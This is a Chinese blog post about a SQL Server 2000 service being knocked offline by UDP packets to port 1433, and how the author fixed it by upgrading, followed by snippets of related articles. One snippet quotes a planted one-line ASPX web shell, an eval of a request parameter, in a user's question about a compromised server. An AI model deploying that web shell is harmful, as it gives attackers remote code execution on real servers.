有关SQL服务器被攻击的问题

前不久,配置好在IDC机房托管的服务器后,回到公司,想来是可以安心工作了。

没想到过了几天经常发现程序运行不正常。
最后一查之下发现是SQL服务找不到。连上服务器后,发现在SQL服务停了,重新开启,过了几分钟又这是类似情况。反复几次,还是不能解决。只有静下心来研究一下。

结果发现定时会有不同IP向服务器的1433端口发送UDP数据包,就是这些数据包让SQL服务给停了的。

唉,不得不再次说到重庆联通IDC机房的安全问题。算了,言归正转,查了不少资料,发现这是SQL2000的一个安全漏洞,利用这个BUG,向1433发送特殊UDP数据包,可以让SQL服务DOWN了。

解决办法呢?

同样用SQL2000,打补丁了,日本MS发布的有解决些内问题的补丁,可是我偏就是个反日情绪颇高的人,才不想去用这个呢。

再查,再查,终于找到了解决办法,有点麻烦,不过想来也不错,把服务器系统换成WINDOWS2003了,直接一换,就OK了。

可是又有新问题出现了,在2003上的SQL不能远程访问,不远程访问, 我们的客户端程序不能运行呀,现在公司还采用的是B/S结构。

再查,再查,嘿嘿,打上SQL2003 SP3B就行了,注意是SP3B,不是SP3A。SP3A还是不能解决这个问题

其实我解决问题的经验很少,两个字,再查。

时间: 2024-10-12 06:00:34

有关SQL服务器被攻击的问题的相关文章

sql注入-服务器被攻击,多了一个image.aspx文件

问题描述 服务器被攻击,多了一个image.aspx文件 我的网站服务器莫名其妙的多了一个image.aspx文件,文件内容是<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>,请问我的服务器是不是陪攻击或注入木马了啊!如果是的话,我的服务器要如何配置才能防止这种木马 解决方案 有可能,设置是服务器防火墙,控制用户权限,安装系统安全补丁,减少

一次服务器被攻击的应急行动

本文讲的是一次服务器被攻击的应急行动, 如果你的PHP服务器被黑客入侵时该怎么办?这是我最近处理linux web服务器发现的一个问题.PHP服务器被黑时,会出现新的PHP文件,这与运行在服务器上的wordpress应用程序和特定的用户代理没有任何关系,所有的流量都被重定向到另一个站点. 应急准备  在第一次被攻击之后,我已经禁用了所有他所检测到的恶意文件,并修复了重定向,直到服务器再次被黑客攻击. 为此,要将这些应用程序转移到新的设备进行分析,我必须在原系统上对下列3个线索进行取证: 应用仍然

tomcat-阿里云服务器被攻击导致被文件删除

问题描述 阿里云服务器被攻击导致被文件删除 使用阿里云部署web项目服务器(tomcat + mysql+window2014),项目刚上线没多久,就被黑客攻击,部署的项目文件全部被删除,请问大牛,能分析下黑客是通过什么途径办到的,该怎么去防护,能提供解决思路就更好了.急~ 解决方案 不知道你是用的什么语言,如果是php一类的脚本语言,如果黑客上传一个精心构造的脚本文件,包含删除的脚本,并且在某种条件下触发执行,就可以删除你的文件.这种攻击方式叫做web shell攻击.http://www.2

最佳安全实践:锁定IIS和SQL服务器

微软的IIS和SQL服务器通常是基于Windows的分布式应用环境的主要部分.这就意味着它们也是最经常受到攻击的目标.在本文中,我们将提供提高这些产品安全性的一些具体建议. 提高IIS安全性的建议 IIS中有一个称作ISAPI的编程接口,这个编程接口与那些以DLL为扩展名的文件有关.这些文件也称作ISAPI扩展. 小知识 ISAPI是(Internet Server API)的缩写,是微软IIS web服务器的一个应用程序编程接口(API),因为ISAPI与Web服务器结合的更紧密,这使程序员可

使用SQL-DMO来操控SQL服务器

SQL的分布式关系对象(SQL-DMO)库允许你的VB6应用程序自动地同SQL服务器进行交互操作.这对于获取关于SQL服务器的信息很有用,例如服务器的状态或者网络上的可用服务器. 要使用SQL-DMO库,就要设置一个对"微软SQL-DMO对象库"的参照. Application对象的ListAvailableSQLServers方法会返回一个NameList对象,它包含有网络上可用服务器的列表.下面的代码显示了一个使用这个方法来填充列表框控件的方法: Dim objSQLApp As

使用查询分析器调整SQL服务器脚本

查询分析|服务器|脚本 我喜欢把SQL服务器所捆绑的工具看作是倒金字塔型的,诊断和检查一般问题的工具在顶端,寻找和诊断问题具体区域的工具在底部.除了提供一种编写SQL脚本的便捷方式之外,在你需要解决特定SQL脚本里明确问题的时候,查询分析器(Query Analyzer)还是所需要使用的资源.如果你需要指出哪个查询正在保持着某个特定表格的锁定状态,你也会希望使用查询分析器. 查询分析器的关键诊断特性是它能够显示某个查询的执行计划.这个执行计划会向你提供各种类型的有用信息,例如在查询的执行期间如何

SQL服务器内存有两种基本管理方法:动态分配和静态分配

动态|服务器|静态 SQL服务器内存有两种基本管理方法:动态分配和静态分配 控制程序可使用的内存数量.动态分配允许管理员声明一块内存的大小:考虑到它的实际使用,SQL服务器可以分配给其需要占用的内存的最大值,并且(理论上)在没有使用内存的情况下将其释放.静态分配则是创建一块固定的内存空间,提供给SQL Server使用--不再进行分配. 在默认情况下,SQL Server被设置成动态分配,分配给其正在运行的计算机内所有可用的物理内存.许多管理员注意到SQL Server内存随时间的流逝被逐渐消耗

保护SQL服务器的安全:用户识别问题

在我们关于SQL服务器安全系列的这文章里,我们的目标是向你提供安全安装SQL服务器所需要的工具和信心,这样的话,你有价值的数据就会受到保护,避免无意或者有意的破坏或者窃取.在本文里,我们会深入一些基础的概念,在保护数据库安全的时候,你需要利用下面这些概念:登录.用户.角色,以及组.确定谁在请求访问数据或者SQL服务器里其他信息等看上去很简单的过程,都需要用到所有这些概念. 登录 登录规定了哪些用户能够连接到安装好的SQL服务器上--这不是某个特定的数据库,而是而是整个服务器.登录有两种不同的形式

用SQL服务器进行多种数据复制

出于多种原因你可能想探索利用不同种类复制的方法,但最大的理由大概是想以此允许管理员向客户提供SQL服务器,而那些客户的公司在其他数据系统中都投资巨大. SQL服务器可让你复制来自任何你可通过32位ODBC驱动进行链接的资源数据.对于Windows 2000,NT甚至是Windows 98来说,你都能采用OLE DB驱动.因此,你可利用SQL服务器复制各种数据资源,如DB2 AS400,DB2/MVS,Oracle,Exchange以及Access.你也能在不同的SQL服务器版本中复制数据,甚至与